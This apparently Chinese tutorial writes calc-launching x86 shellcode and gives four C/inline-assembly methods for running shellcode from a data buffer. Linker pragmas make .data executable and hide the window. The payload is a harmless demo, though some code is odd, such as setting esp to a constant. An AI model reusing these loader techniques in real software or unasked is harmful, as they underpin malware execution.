首先写出汇编成功弹出计算器
#pragma comment(linker,"/section:.data,RWE") //data段可读写
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口
#pragma comment(linker,"/INCREMENTAL:NO") //指定非增量编译
#include "windows.h"
void main()
{
__asm{
sub esp,0x454
xor ebx,ebx
push ebx
mov eax,0x6578652e
push eax
mov eax,0x636c6163
push eax
mov eax,esp
push 5
push eax
mov eax,0x74f0dab0
call eax
mov esp,0x450
}
}
mov eax,0x74f0dab0
call eax
提取汇编的机器码
unsigned char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50"
"\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50"
"\xB8\xB0\xDA\xF0\x74\xFF\xD0"
"\xBC\x50\x04\x00\x00";
接下来就是如何执行shellcode了
将shellcode硬改成函数名,然后shellcode的内容相当于函数体
void Run1()
{
((void(*)(void))&shellcode)();
}
//第2种方法
void Run2()
{
__asm{
lea eax,shellcode
jmp eax
}
}
和0x02方法相同,写法不一样
//第3种方法
void Run3()
{
__asm{
mov eax,offset shellcode
jmp eax
}
}
用emit在当前位置直接插入数据(实际上是指令),硬编码执行
//第四种方法
void Run4()
{
__asm{
mov eax,offset shellcode
_emit 0xff;
_emit 0xe0;
}
}
#pragma comment(linker,"/section:.data,RWE") //data段可读写
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口
#pragma comment(linker,"/INCREMENTAL:NO") //指定非增量编译
#include "windows.h"
unsigned char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50"
"\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50"
"\xB8\xB0\xDA\xF0\x74\xFF\xD0"
"\xBC\x50\x04\x00\x00";
//第一种方法
void Run1()
{
((void(*)(void))&shellcode)();
}
//第2种方法
void Run2()
{
__asm{
lea eax,shellcode
jmp eax
}
}
//第3种方法
void Run3()
{
__asm{
mov eax,offset shellcode
jmp eax
}
}
//第四种方法
void Run4()
{
__asm{
mov eax,offset shellcode
_emit 0xff; //用emigt就是在当前位置直接插入数据(实际上是指令),硬编码执行
_emit 0xe0;
}
}
void main()
{
/*
__asm{
sub esp,0x454
xor ebx,ebx
push ebx
mov eax,0x6578652e
push eax
mov eax,0x636c6163
push eax
mov eax,esp
push 5
push eax
mov eax,0x74f0dab0
call eax
mov esp,0x450
}
*/
Run1();
}
因篇幅问题不能全部显示,请点此查看更多更全内容